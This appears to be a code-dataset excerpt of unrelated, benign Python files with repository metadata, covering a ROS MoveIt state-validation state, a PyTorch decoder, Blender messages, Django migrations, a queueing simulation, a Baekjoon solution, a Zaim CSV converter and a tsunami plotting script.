># group_name string Name of the group to be used for query
#> status_text string Status text for any errors
<= valid State has been validated.
<= invalid State is not valid given constraints
<= failed State has not been validated.
'''
def __init__(self, timeout=5.0, wait_duration=0.001, action_topic=None, group_name=None):
'''
Constructor
'''
super(StateValidationState, self).__init__(
input_keys=['action_topic','group_name'],
outcomes=['valid', 'invalid', 'failed'],
output_keys=['status_text'] )
self.client = None
self.wait_duration = wait_duration
self.given_action_topic = action_topic
if (self.given_action_topic is not None) and (len(self.given_action_topic) > 0):
# If topic is defined, set the client up on startup
self.client = ProxyActionClient({self.given_action_topic: StateValidationAction},
self.wait_duration)
else:
self.given_action_topic = None # handle empty string
self.current_action_topic = self.given_action_topic
self.group_name = group_name
if (self.group_name is not None and len(self.group_name)==0):
self.group_name = None # handle empty string
# Not doing anything with result values for now
#self.valid = None
#self.contacts = None
#self.cost_sources = None
#self.constraint_result = None
self.moveit_client = None
try:
self.moveit_client = ProxyMoveItClient(None)
except Exception as e:
Logger.logerr(" %s - exception on initialization of ProxyMoveItClient \n%s"% (self.name, str(e)))
self.timeout_duration = rospy.Duration(timeout)
self.return_code = None
self.status_text = None
def execute(self, userdata):
'''
Execute this state
'''
if self.return_code is not None:
# Return any previously assigned return code if we are in pause
userdata.status_text = self.status_text
return self.return_code
if self.client.has_result(self.current_action_topic):
result = self.client.get_result(self.current_action_topic)
if (result.valid):
self.return_code = 'valid'
self.status_text = 'checked robot state is valid'
else:
self.return_code = 'invalid'
self.status_text = 'checked robot state is not valid! number of contacts = %d' % (len(result.contacts))
Logger.loginfo(self.status_text)
userdata.status_text = self.status_text
return self.return_code
elif self.client.get_state(self.current_action_topic) == GoalStatus.ABORTED:
self.status_text = "StateValidation - %s request aborted by state validation action server\n %s" % (self.name, self.action_client.get_goal_status_text(self.current_action_topic))
self.return_code = 'failed'
Logger.logerr(self.status_text)
userdata.status_text = self.status_text
return self.return_code
elif self.client.get_state(self.current_action_topic) == GoalStatus.REJECTED:
# No result returned is returned for this action, so go by the client state
userdata.valid = self.valid
self.status_text = "StateValidation - %s request rejected by state validation action server" % (self.name, self.action_client.get_goal_status_text(self.current_action_topic))
self.return_code = 'failed'
Logger.logerr(self.status_text)
userdata.status_text = self.status_text
return self.return_code
elif self.timeout_target is not None and rospy.Time.now() > self.timeout_target:
self.status_text = "StateValidation - timeout waiting for %s to state validation (%f > %f (%f))" % (self.name, rospy.Time.now().to_sec(), self.timeout_target.to_sec(), self.timeout_duration.to_sec())
self.return_code = 'failed'
Logger.logerr(self.status_text)
userdata.status_text = self.status_text
return self.return_code
#Logger.logwarn("StateValidation - %s (%f > %f (%f))" % (self.name, rospy.Time.now().to_sec(), self.timeout_target.to_sec(), self.timeout_duration.to_sec()))
# Normal monitoring
def on_enter(self, userdata):
    """
    Prepare and send a StateValidation action goal when the state is entered.

    Resolves the planning group and action topic (from parameters or from
    userdata), lazily creates/checks the ProxyActionClient, builds the goal
    from the current robot state and constraints, and sends it.  On any
    failure, sets self.return_code ('failed' or 'param_error') and logs the
    reason; success leaves return_code as None for execute() to fill in.
    """
    self.return_code = None
    self.status_text = None

    # Retrieve the relevant data (parameters win; fall back to userdata)
    group_name = self.group_name
    self.current_action_topic = self.given_action_topic
    try:
        if (self.group_name is None):
            group_name = userdata.group_name
        if (self.given_action_topic is None):
            self.current_action_topic = userdata.action_topic
    except Exception as e:
        self.status_text = 'Failed to set up the action client for %s - invalid user data parameters\n%s' % (self.current_action_topic, str(e))
        self.return_code = 'failed'
        Logger.logerr(self.status_text)
        return

    try:
        # Create the proxy client on first use, then verify the server is up.
        if (self.client is None):
            self.client = ProxyActionClient({self.current_action_topic: StateValidationAction},
                                            self.wait_duration)
        if not self.client.is_available(self.current_action_topic):
            self.client.setupClient(self.current_action_topic, StateValidationAction, self.wait_duration)
            if not self.client.is_available(self.current_action_topic):
                self.status_text = 'StateValidationAction client is not available for %s' % (self.current_action_topic)
                self.return_code = 'param_error'
                Logger.logerr(self.status_text)
                return
    except Exception as e:
        Logger.logwarn('Failed to set up the StateValidationAction client for %s\n%s' % (self.current_action_topic, str(e)))
        self.return_code = 'failed'
        return

    try:
        # Action Initialization
        action_goal = StateValidationGoal()
        action_goal.group_name = group_name
        action_goal.robot_state = self.moveit_client.get_robot_state(group_name)
        action_goal.constraints = self.moveit_client.get_constraints(group_name)
        if (self.timeout_duration > rospy.Duration(0.0)):
            self.timeout_target = rospy.Time.now() + self.timeout_duration
        else:
            self.timeout_target = None
        Logger.logwarn('before send goal get state in the StateValidationAction client for %s' % (self.name))
        # Fix: these were Python-2 print statements ("print str(...)"), a
        # syntax error under Python 3; converted to function-call form with
        # identical output.
        print(str(action_goal))
        print(self.current_action_topic)
        self.client.send_goal(self.current_action_topic, action_goal)
        Logger.logwarn('after send goal in the StateValidationAction client for %s' % (self.name))
    except Exception as e:
        self.status_text = 'Failed to send action goal for group - %s\n%s' % (self.name, str(e))
        self.return_code = 'failed'
        Logger.logerr(self.status_text)
        return
def on_stop(self):
    """Cancel any still-pending validation goal when the behavior shuts down."""
    try:
        client = self.client
        pending = (client.is_available(self.current_action_topic)
                   and not client.has_result(self.current_action_topic))
        if pending:
            # A goal is still active on the server - cancel it before exit.
            client.cancel(self.current_action_topic)
    except Exception as e:
        # The proxy client may already have been torn down; just note it.
        Logger.logwarn('Action client already closed - %s\n%s' % (self.current_action_topic, str(e)))
def on_pause(self):
    """No pause-specific handling is required for this state."""
    pass
def on_resume(self, userdata):
    """Re-run on_enter so the validation request is re-issued after a pause."""
    # If paused during state execution, then re-send the clear command
    self.on_enter(userdata)
| 3,406 | 0 | 108 |
0000c38c9907915220ad701f5b1b867061a657a4 | 1,120 | py | Python | network/Decoder.py | muberraozmen/MrMP | da6bcccbad85a682c848ff4aa1121c773d779e57 | [
"MIT"
] | null | null | null | network/Decoder.py | muberraozmen/MrMP | da6bcccbad85a682c848ff4aa1121c773d779e57 | [
"MIT"
] | null | null | null | network/Decoder.py | muberraozmen/MrMP | da6bcccbad85a682c848ff4aa1121c773d779e57 | [
"MIT"
] | null | null | null | from network.Modules import *
__all__ = ['Decoder']
| 29.473684 | 101 | 0.682143 | from network.Modules import *
__all__ = ['Decoder']
class DecoderLayer(nn.Module):
    """One decoder layer: multi-head attention over the encoder output,
    followed by a position-wise feed-forward transform."""

    def __init__(self, d_model, d_inner, n_head, d_k, d_v, dropout=0.1):
        super().__init__()
        self.enc_attn = MultiHeadAttention(n_head, d_model, d_k, d_v, dropout=dropout)
        self.pos_ffn1 = PositionwiseFeedForward(d_model, d_inner, dropout=dropout)

    def forward(self, dec_input, enc_output, dec_enc_attn_mask=None):
        # Queries come from the decoder side; keys/values from the encoder.
        attended = self.enc_attn(dec_input, enc_output, enc_output, mask=dec_enc_attn_mask)
        return self.pos_ffn1(attended)
class Decoder(nn.Module):
    """A sequential stack of DecoderLayer modules."""

    def __init__(self, opt):
        super().__init__()
        layers = (
            DecoderLayer(opt.d_model, opt.d_inner, opt.n_head, opt.d_k, opt.d_v,
                         dropout=opt.dropout)
            for _ in range(opt.n_layers_dec)
        )
        self.layer_stack = nn.ModuleList(layers)

    def forward(self, dec_input, enc_outputs, mask):
        # Every layer attends to the last encoder output (enc_outputs[-1]).
        output = dec_input
        for layer in self.layer_stack:
            output = layer(output, enc_outputs[-1], dec_enc_attn_mask=mask)
        return output
| 895 | 13 | 154 |
378cf7dca487527b4a9f6e1bf40392184760e105 | 2,456 | py | Python | blendernc/messages.py | blendernc/blendernc | 11a545270720e5489174b39693d317a797eea273 | [
"MIT"
] | 39 | 2020-06-15T15:58:43.000Z | 2022-02-02T01:11:57.000Z | blendernc/messages.py | netgodz/blendernc | 09ed7c7791da46abb2c5fd3ee83286ef0bf82302 | [
"MIT"
] | 137 | 2020-06-19T15:29:06.000Z | 2022-03-30T11:18:55.000Z | blendernc/messages.py | netgodz/blendernc | 09ed7c7791da46abb2c5fd3ee83286ef0bf82302 | [
"MIT"
] | 8 | 2020-06-17T09:33:12.000Z | 2022-01-21T00:26:19.000Z | #!/usr/bin/env python3
import warnings
import bpy
# TODO Replace all messages with print_message.
# Possibly shift to class when blendernc is initiated. and move to logging.
| 23.390476 | 88 | 0.675896 | #!/usr/bin/env python3
import warnings
import bpy
# TODO Replace all messages with print_message.
# Possibly shift to class when blendernc is initiated. and move to logging.
class PrintMessage(object):
    """Build a message from a zero-argument text factory and display it:
    a Blender popup in UI mode, a console warning in background mode."""

    def __init__(self, text, title, icon):
        # `text` is a callable returning the message body.
        self.message = text()
        self.title = title
        self.icon = icon
        self.print_message()

    def print_message(self):
        if bpy.app.background:
            # No window manager available - fall back to a console warning.
            warnings.warn(u"Running in background mode,\n {0}".format(self.message))
            return
        bpy.context.window_manager.popup_menu(
            self.message_contructor, title=self.title, icon=self.icon
        )

    def message_contructor(self, wm_self, context):
        # Draw callback used by popup_menu: a single label with the message.
        wm_self.layout.label(text=self.message)
def asign_material():
    """Message shown when a material must be assigned to an object."""
    return "Assign material to object!"
def load_after_restart():
    """Message noting that a change only takes effect after restart/new file."""
    return "This change will be loaded after restarting Blender or creating a new file."
def active_selection_preference():
    """Message warning that the active selection wins over the picked object."""
    return (
        "The active selection has preference over picked object. "
        "Make sure you selected the right mesh to apply material."
    )
def huge_image():
    """Message shown when the requested image exceeds the size limit."""
    return "Image is larger than 4096x4096 pixels, reduce the resolution."
def drop_dim():
    """Message asking the user to reduce a 4D field before plotting."""
    return "4D field, drop a dimension or select a slice"
def unselected_object():
    """Message shown when no object is selected for the material."""
    return "Select an object to apply material."
def select_file():
    """Message shown when no input file has been selected."""
    return "Select a file!"
def no_cached_image():
    """Message shown when the image cache is empty."""
    return "Images haven't been cached."
def no_cached_nodes():
    """Message shown when the node tree has not been cached."""
    return "NodeTree hasn't been cached."
def client_exists():
    """Message noting that an existing client will be replaced."""
    return "Client exists; a new client will be created."
def same_min_max_value():
    """Message shown after repeated failed attempts to sample a value range."""
    return (
        "Random sampling has been attempted 4 times. "
        "Please increase the resolution "
        "or define the max and min values of the dataset "
        "by using a Range node."
    )
def unselected_datacube():
    """Message shown when no datacube variable is selected."""
    return "Select a variable from the datacube."
def unselected_variable():
    """Message asking the user to re-select a datacube variable."""
    return "Reselect a variable from the datacube."
def unselected_dim(self, context):
    """Popup draw callback asking the user to pick a dimension to drop."""
    message = "Select a dimension to drop."
    self.layout.label(text=message)
def unselected_coord(self, context):
    """Popup draw callback asking the user to pick a coordinate to drop."""
    message = "Select a coordinate to drop."
    self.layout.label(text=message)
| 1,811 | 6 | 447 |
25d83a23955fc06a3f295c7d49f12798eea2f86b | 1,911 | py | Python | raspeedi/migrations/0001_initial.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | raspeedi/migrations/0001_initial.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | raspeedi/migrations/0001_initial.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | # Generated by Django 2.2.1 on 2019-06-04 11:41
from django.db import migrations, models
| 57.909091 | 239 | 0.591313 | # Generated by Django 2.2.1 on 2019-06-04 11:41
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the Raspeedi table.

    Auto-generated by Django (makemigrations); keep byte-stable so the
    recorded migration state stays consistent with the database schema.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Raspeedi',
            fields=[
                # Hardware reference used as the primary key (no auto id).
                ('ref_boitier', models.BigIntegerField(primary_key=True, serialize=False, verbose_name='référence boîtier')),
                ('produit', models.CharField(choices=[('RT4', 'RT4'), ('RT5', 'RT5'), ('RT6', 'RT6'), ('RT6v2', 'RT6 version 2'), ('SMEG', 'SMEG'), ('SMEGP', 'SMEG+ / SMEG+ IV1'), ('SMEGP2', 'SMEG+ IV2')], max_length=20)),
                ('facade', models.CharField(max_length=2, verbose_name='façade')),
                ('type', models.CharField(choices=[('RAD', 'Radio'), ('NAV', 'Navigation')], max_length=3)),
                ('dab', models.BooleanField(default=False, verbose_name='DAB')),
                ('cam', models.BooleanField(default=False, verbose_name='caméra de recul')),
                ('dump_peedi', models.CharField(blank=True, max_length=25, null=True, verbose_name='dump PEEDI')),
                ('cd_version', models.CharField(blank=True, max_length=10, null=True)),
                ('media', models.CharField(choices=[('N/A', 'Vide'), ('HDD', 'Disque Dur'), ('8Go', 'Carte SD 8Go'), ('16Go', 'Carte SD 16Go'), ('8Go 16Go', 'Carte SD 8 ou 16 Go')], max_length=20, null=True, verbose_name='type de média')),
                ('carto', models.CharField(blank=True, max_length=20, null=True, verbose_name='version cartographie')),
                ('dump_renesas', models.CharField(blank=True, max_length=50, null=True)),
                ('ref_mm', models.CharField(blank=True, max_length=200, null=True)),
                ('connecteur_ecran', models.IntegerField(choices=[(1, '1'), (2, '2')], null=True, verbose_name="nombre de connecteur d'écran")),
            ],
        ),
    ]
| 0 | 1,804 | 23 |
98075587e2bfd7e8b06a04f56e0bdc4ea5bc88f8 | 5,808 | py | Python | TP3/MM1K.py | NicolasBologna/Simulacion | d407379b182a373d9f28ca74c25472e711b5fc0f | [
"MIT"
] | null | null | null | TP3/MM1K.py | NicolasBologna/Simulacion | d407379b182a373d9f28ca74c25472e711b5fc0f | [
"MIT"
] | null | null | null | TP3/MM1K.py | NicolasBologna/Simulacion | d407379b182a373d9f28ca74c25472e711b5fc0f | [
"MIT"
] | null | null | null | import sys
import numpy as np
import statistics
import matplotlib.pyplot as plt
from MM1Utiles import funExpon
#README
#Criterio de estabilidad MM1: la tasa de servicio debe ser mayor que la tasa de llegada
NumEvents = 2 #Defimos número de tipos de eventos (usamos 2: arribos y llegadas)
#Constantes a usar para entender mejor el código
BUSY = 1
IDLE = 0
#QLIMIT = 10**5 #Hay que probar cambiando
if __name__ == '__main__':
global MeanInterarrival, MeanService, NumDelaysRequired, QLIMIT
MeanInterarrival = 2.5 #tiempo medio de llegada **lambda
MeanService = 10 #tiempo medio de servicio **MU
NumDelaysRequired = 10000 #número total de clientes cuyas demoras serán observadas
print("Mean Interarrival: ",MeanInterarrival,"Mean Service: ",MeanService,"Number delays Required (cuantas personas ): ", NumDelaysRequired)
lista_media_arribos = [2.5, 5, 7.5, 10, 12.5]
lista_limites_cola = [0, 2, 5, 10, 50]
lista_conjunto = []
for limiteCola in reversed(lista_limites_cola):
lista_individual = []
for mediaArribo in reversed(lista_media_arribos):
MeanInterarrival = mediaArribo
QLIMIT = limiteCola
n = 10
lista_recahzados = []
for i in range(n):
rta = ExecuteSimulation()
lista_recahzados.append(rta)
lista_individual.append([mediaArribo,round(statistics.mean(lista_recahzados),4)])
print(round(MeanInterarrival*MeanService,0), "\% & ", QLIMIT , " & ", round(statistics.mean(lista_recahzados),4), "\\\\")
lista_conjunto.append([limiteCola, lista_individual])
for limiteCola, lista_individual in lista_conjunto:
print(limiteCola,lista_individual)
lista_relacion = []
lista_probDenegado = []
for i,j in lista_individual:
lista_relacion.append(i*10)
lista_probDenegado.append(j)
plt.title('probabilidad de denegación de \nservicio con limite de cola = '+ str(limiteCola))
plt.plot(lista_relacion, lista_probDenegado, markersize=1, lw=1,color='r')
plt.grid(True)
plt.xlabel('Porcentaje de arribo con respecto al servicio')
plt.ylabel('Probabilidad de denegación')
plt.savefig('Prob_denegación_'+str(limiteCola)+'.png')
plt.show()
| 31.394595 | 145 | 0.660813 | import sys
import numpy as np
import statistics
import matplotlib.pyplot as plt
from MM1Utiles import funExpon
#README
#Criterio de estabilidad MM1: la tasa de servicio debe ser mayor que la tasa de llegada
NumEvents = 2 #Defimos número de tipos de eventos (usamos 2: arribos y llegadas)
#Constantes a usar para entender mejor el código
BUSY = 1
IDLE = 0
#QLIMIT = 10**5 #Hay que probar cambiando
def Report():
    """Return the observed blocking probability: rejected arrivals / total arrivals."""
    global NumCustsDelayed, NumRejected
    return NumRejected/NumArrivals
def Initialize():
    """Reset the simulation clock, server/queue state, counters and event list
    for one replication of the M/M/1/K simulation."""
    global MeanInterarrival, Time, TimeNextEvent, ServerStatus, NumCustsDelayed, TotalOfDelays, \
        AreaNumInQ, AreaServerStatus, NextEventType, NumDelaysRequired, NumInQ, MeanService, TimeLastEvent, TimeArrival, NumRejected, NumArrivals
    Time = 0
    ServerStatus = IDLE
    # integer state variables
    NextEventType = 0
    NumCustsDelayed = 0
    NumInQ = 0  # number of customers currently waiting in queue
    ServerStatus = 0  # (redundant: already set to IDLE, which is 0, above)
    NumRejected = 0
    NumArrivals = 0
    # real-valued accumulators
    AreaNumInQ = 0  # area under the number-in-queue curve
    AreaServerStatus = 0
    Time = 0
    TimeLastEvent = 0  # time of the last event that changed the queue length
    TotalOfDelays = 0  # accumulated delay of customers that completed their wait
    # arrays
    TimeArrival = np.zeros([QLIMIT+1])
    TimeNextEvent = np.zeros([NumEvents+1])  # TimeNextEvent[I] holds the time of the next event of type I
    TimeNextEvent[1] = Time + funExpon(1/MeanInterarrival)
    TimeNextEvent[2] = 10**30  # "infinity": no departure scheduled while the server is idle
def Timing():
    """Advance the simulation clock to the most imminent scheduled event and
    record its type in NextEventType (1 = arrival, 2 = departure)."""
    global Time, NextEventType
    MinTimeNextEvent = 10**29
    NextEventType = 0
    # Scan the event list for the earliest event time.
    for i in range(1,NumEvents+1):
        if TimeNextEvent[i] < MinTimeNextEvent:
            MinTimeNextEvent = TimeNextEvent[i]
            NextEventType = i
    if (NextEventType > 0):
        Time = TimeNextEvent[NextEventType]
    else:
        # Empty event list: the simulation cannot progress - abort.
        print("La lista de eventos está vacía en el momento: ", Time, " NextEventType == 0, error en timing")
        sys.exit()
def Arrive():
    """Handle a customer arrival: schedule the next arrival, then either
    queue the customer, reject it (queue full), or start service at once."""
    global ServerStatus,TimeArrival, TotalOfDelays, NumCustsDelayed, TimeNextEvent, NumInQ, MeanService, NumRejected, NumArrivals
    TimeNextEvent[1] = Time + funExpon(1/MeanInterarrival)
    NumArrivals += 1
    if ServerStatus == BUSY:
        NumInQ += 1
        if NumInQ > QLIMIT:
            # Queue is full (the K in M/M/1/K): the customer is turned away.
            #print(NumRejected)
            NumInQ -= 1
            NumRejected += 1
        else:
            # Record arrival time so its delay can be computed at departure.
            TimeArrival[NumInQ] = Time
    else:
        # Server idle: the customer enters service immediately with zero delay.
        Delay = 0
        TotalOfDelays = TotalOfDelays + Delay
        NumCustsDelayed = NumCustsDelayed + 1
        ServerStatus = BUSY
        TimeNextEvent[2] = Time + funExpon(1/MeanService)
def Depart():
    """Handle a service completion: free the server if the queue is empty,
    otherwise start serving the first queued customer (FIFO)."""
    global NumInQ, TotalOfDelays,NumCustsDelayed, ServerStatus, TimeNextEvent, Time, TimeArrival
    if (NumInQ == 0):
        ServerStatus = IDLE
        TimeNextEvent[2] = 10**30  # no departure scheduled while idle
    else:
        NumInQ = NumInQ - 1
        Delay = Time - TimeArrival[1]  # FIFO: slot 1 is the next customer
        TotalOfDelays = TotalOfDelays + Delay
        NumCustsDelayed += 1
        TimeNextEvent[2] = Time + funExpon(1/MeanService)
        # Shift the remaining queue slots one position to the left.
        for I in range(1,NumInQ+1):
            TimeArrival[I] = TimeArrival[I+1]
def UpdateTimeAvgStats():
    """Accumulate the time-weighted statistics (queue length and server
    utilization areas) over the interval since the previous event."""
    global TimeLastEvent, AreaNumInQ, AreaServerStatus, Time
    TimeSinceLastEvent = Time - TimeLastEvent
    TimeLastEvent = Time
    AreaNumInQ = AreaNumInQ + NumInQ * TimeSinceLastEvent
    AreaServerStatus = AreaServerStatus + ServerStatus * TimeSinceLastEvent
def ExecuteSimulation():
    """Run one replication until NumDelaysRequired customers have completed
    their delays; return the rejection ratio from Report()."""
    global NumCustsDelayed, NumDelaysRequired
    Initialize()
    while(NumCustsDelayed < NumDelaysRequired):
        # Advance to the next event, update time-average stats, dispatch.
        Timing()
        UpdateTimeAvgStats()
        if (NextEventType == 1):
            Arrive()
        elif (NextEventType == 2):
            Depart()
        else:
            print ("Error in NextEventType, Value = ",NextEventType)
    return Report()
if __name__ == '__main__':
    # NOTE: a module-level `global` statement is a no-op; kept as-is.
    global MeanInterarrival, MeanService, NumDelaysRequired, QLIMIT
    MeanInterarrival = 2.5  # mean inter-arrival time (lambda)
    MeanService = 10  # mean service time (mu)
    NumDelaysRequired = 10000  # total customers whose delays are observed
    print("Mean Interarrival: ",MeanInterarrival,"Mean Service: ",MeanService,"Number delays Required (cuantas personas ): ", NumDelaysRequired)
    lista_media_arribos = [2.5, 5, 7.5, 10, 12.5]
    lista_limites_cola = [0, 2, 5, 10, 50]
    lista_conjunto = []
    # Sweep queue limits (K) and arrival means; average the rejection
    # probability over n=10 replications per combination.
    for limiteCola in reversed(lista_limites_cola):
        lista_individual = []
        for mediaArribo in reversed(lista_media_arribos):
            MeanInterarrival = mediaArribo
            QLIMIT = limiteCola
            n = 10
            lista_recahzados = []
            for i in range(n):
                rta = ExecuteSimulation()
                lista_recahzados.append(rta)
            lista_individual.append([mediaArribo,round(statistics.mean(lista_recahzados),4)])
            # LaTeX table row: load %, queue limit, mean rejection probability.
            print(round(MeanInterarrival*MeanService,0), "\% & ", QLIMIT , " & ", round(statistics.mean(lista_recahzados),4), "\\\\")
        lista_conjunto.append([limiteCola, lista_individual])
    # One plot per queue limit: rejection probability vs. arrival/service ratio.
    for limiteCola, lista_individual in lista_conjunto:
        print(limiteCola,lista_individual)
        lista_relacion = []
        lista_probDenegado = []
        for i,j in lista_individual:
            lista_relacion.append(i*10)
            lista_probDenegado.append(j)
        plt.title('probabilidad de denegación de \nservicio con limite de cola = '+ str(limiteCola))
        plt.plot(lista_relacion, lista_probDenegado, markersize=1, lw=1,color='r')
        plt.grid(True)
        plt.xlabel('Porcentaje de arribo con respecto al servicio')
        plt.ylabel('Probabilidad de denegación')
        plt.savefig('Prob_denegación_'+str(limiteCola)+'.png')
        plt.show()
| 3,294 | 0 | 173 |
65dc232a4e565e414a1ddeeebbd38bc5f5656593 | 599 | py | Python | 13022.py | WaiNaat/BOJ-Python | 3365ef090c7dcf6e6a598fea0b25c416a5a3e01b | [
"MIT"
] | null | null | null | 13022.py | WaiNaat/BOJ-Python | 3365ef090c7dcf6e6a598fea0b25c416a5a3e01b | [
"MIT"
] | null | null | null | 13022.py | WaiNaat/BOJ-Python | 3365ef090c7dcf6e6a598fea0b25c416a5a3e01b | [
"MIT"
] | null | null | null | # input
word = input()
# process
'''
처음에 o가 나올때까지 w의 개수를 세면 됨.
'''
isValid = True
i = 0
while i < len(word):
# w
wCnt = 0
while i < len(word) and word[i] == 'w':
i += 1
wCnt += 1
if wCnt == 0: isValid = False
# o
cnt = 0
while i < len(word) and word[i] == 'o':
i += 1
cnt += 1
if cnt != wCnt: isValid = False
# l
cnt = 0
while i < len(word) and word[i] == 'l':
i += 1
cnt += 1
if cnt != wCnt: isValid = False
# f
cnt = 0
while i < len(word) and word[i] == 'f':
i += 1
cnt += 1
if cnt != wCnt: isValid = False
if not isValid: break
# output
print(1 if isValid else 0) | 16.638889 | 40 | 0.540902 | # input
# BOJ 13022: a valid "wolf howl" is one or more groups of w..o..l..f where,
# within each group, the runs of w, o, l and f all have the same length.
# input
word = input()

# process
'''
Count the leading run of 'w'; the following runs of 'o', 'l' and 'f'
must each have exactly that length.
(Original note: 처음에 o가 나올때까지 w의 개수를 세면 됨.)
'''
isValid = True
i = 0
while i < len(word):
    # w: measure the reference run length for this group
    wCnt = 0
    while i < len(word) and word[i] == 'w':
        i += 1
        wCnt += 1
    if wCnt == 0: isValid = False
    # o: run length must match the w count
    cnt = 0
    while i < len(word) and word[i] == 'o':
        i += 1
        cnt += 1
    if cnt != wCnt: isValid = False
    # l
    cnt = 0
    while i < len(word) and word[i] == 'l':
        i += 1
        cnt += 1
    if cnt != wCnt: isValid = False
    # f
    cnt = 0
    while i < len(word) and word[i] == 'f':
        i += 1
        cnt += 1
    if cnt != wCnt: isValid = False
    if not isValid: break

# output
print(1 if isValid else 0)
a5cbcb842d821b1612b92455a043bbf547f0e203 | 795 | py | Python | zaimcsvconverter/zaim_csv_converter.py | yukihiko-shinoda/zaim-csv-converter | 28b124573a6dfdb03fc94985c84684e639346b2c | [
"MIT"
] | 1 | 2020-01-09T00:45:20.000Z | 2020-01-09T00:45:20.000Z | zaimcsvconverter/zaim_csv_converter.py | yukihiko-shinoda/zaim-csv-converter | 28b124573a6dfdb03fc94985c84684e639346b2c | [
"MIT"
] | 4 | 2020-05-31T19:55:26.000Z | 2021-11-13T09:54:02.000Z | zaimcsvconverter/zaim_csv_converter.py | yukihiko-shinoda/zaim-csv-converter | 28b124573a6dfdb03fc94985c84684e639346b2c | [
"MIT"
] | null | null | null | """This module implements converting steps from account CSV to Zaim CSV."""
from zaimcsvconverter import CONFIG, PATH_FILE_CONFIG, DirectoryCsv
from zaimcsvconverter.convert_table_importer import ConvertTableImporter
from zaimcsvconverter.input_csv_converter_iterator import InputCsvConverterIterator
from zaimcsvconverter.models import initialize_database
class ZaimCsvConverter:
    """This class implements converting steps from account CSV to Zaim CSV."""

    @staticmethod
    def execute() -> None:
        """This method executes all CSV converters."""
        # Load user configuration, then prepare the database.
        CONFIG.load(PATH_FILE_CONFIG)
        initialize_database()
        # Import the conversion tables, then convert every input CSV.
        ConvertTableImporter(DirectoryCsv.CONVERT.value).execute()
        InputCsvConverterIterator(DirectoryCsv.INPUT.value, DirectoryCsv.OUTPUT.value).execute()
| 44.166667 | 96 | 0.788679 | """This module implements converting steps from account CSV to Zaim CSV."""
from zaimcsvconverter import CONFIG, PATH_FILE_CONFIG, DirectoryCsv
from zaimcsvconverter.convert_table_importer import ConvertTableImporter
from zaimcsvconverter.input_csv_converter_iterator import InputCsvConverterIterator
from zaimcsvconverter.models import initialize_database
class ZaimCsvConverter:
    """This class implements converting steps from account CSV to Zaim CSV."""

    @staticmethod
    def execute() -> None:
        """This method executes all CSV converters."""
        # Load user configuration, then prepare the database.
        CONFIG.load(PATH_FILE_CONFIG)
        initialize_database()
        # Import the conversion tables, then convert every input CSV.
        ConvertTableImporter(DirectoryCsv.CONVERT.value).execute()
        InputCsvConverterIterator(DirectoryCsv.INPUT.value, DirectoryCsv.OUTPUT.value).execute()
| 0 | 0 | 0 |
d5e7c18bd1ec88ecd0da18a5cacdc574bd5930a8 | 1,212 | py | Python | classroom/migrations/0004_roomstream.py | Minecraft3193092/school-classroom | c0ea63f09d4125b0ae9033fd8b0a4aab2604bb42 | [
"Apache-2.0"
] | 11 | 2021-07-16T11:08:29.000Z | 2022-01-10T12:53:03.000Z | classroom/migrations/0004_roomstream.py | Minecraft3193092/school-classroom | c0ea63f09d4125b0ae9033fd8b0a4aab2604bb42 | [
"Apache-2.0"
] | 1 | 2021-11-11T09:35:20.000Z | 2022-01-13T05:15:19.000Z | classroom/migrations/0004_roomstream.py | Allesanddro/Zooming-cls | 5555f1aa588ede6707b34ed8ac91bd4daeb4989c | [
"Apache-2.0"
] | 9 | 2021-09-02T06:30:02.000Z | 2022-03-28T16:53:05.000Z | # Generated by Django 3.1.5 on 2021-07-13 07:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
| 36.727273 | 129 | 0.618812 | # Generated by Django 3.1.5 on 2021-07-13 07:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
    """Creates the RoomStream table (posts attached to a classroom).

    Auto-generated by Django (makemigrations); keep byte-stable so the
    recorded migration state stays consistent with the database schema.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('classroom', '0003_auto_20210712_1322'),
    ]

    operations = [
        migrations.CreateModel(
            name='RoomStream',
            fields=[
                ('created_at', models.DateTimeField(auto_now_add=True, null=True)),
                ('updated_at', models.DateTimeField(auto_now=True, null=True)),
                # UUID primary key instead of the default auto-increment id.
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('post', models.TextField()),
                ('is_featured', models.BooleanField(default=False)),
                # Keep the post if its room is deleted; drop it with its user.
                ('room', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='classroom.classroom')),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| 0 | 1,020 | 23 |
dc4949ec7770471dd8d5f3920a8442c211a7a49b | 1,584 | py | Python | src/ch02/plot_height_multipanel.py | AAGAN/tsunami | 82635516dcb7f85eb6434ffdb98a9ddc4c1403ad | [
"MIT"
] | 103 | 2018-03-29T23:39:31.000Z | 2022-03-29T12:24:25.000Z | src/ch02/plot_height_multipanel.py | AAGAN/tsunami | 82635516dcb7f85eb6434ffdb98a9ddc4c1403ad | [
"MIT"
] | 13 | 2018-04-06T14:33:04.000Z | 2022-03-21T19:50:12.000Z | src/ch02/plot_height_multipanel.py | AAGAN/tsunami | 82635516dcb7f85eb6434ffdb98a9ddc4c1403ad | [
"MIT"
] | 32 | 2018-04-01T19:54:12.000Z | 2022-03-27T14:06:03.000Z | """
plot_water_height_multipanel.py
Reads output of tsunami and plots the results in an image file.
"""
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('input_file', help='text file output by the tsunami simulator (chapter 2 version)')
args = parser.parse_args()
input_file = args.input_file
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from sys import platform
if platform == 'win32':
unicodeVar = 'utf-16'
else:
unicodeVar = 'utf-8'
matplotlib.use('Agg')
matplotlib.rcParams.update({'font.size': 16})
# read data into a list
data = [line.rstrip().split() for line in open(input_file, encoding = unicodeVar).readlines()]
time = [float(line[0]) for line in data]
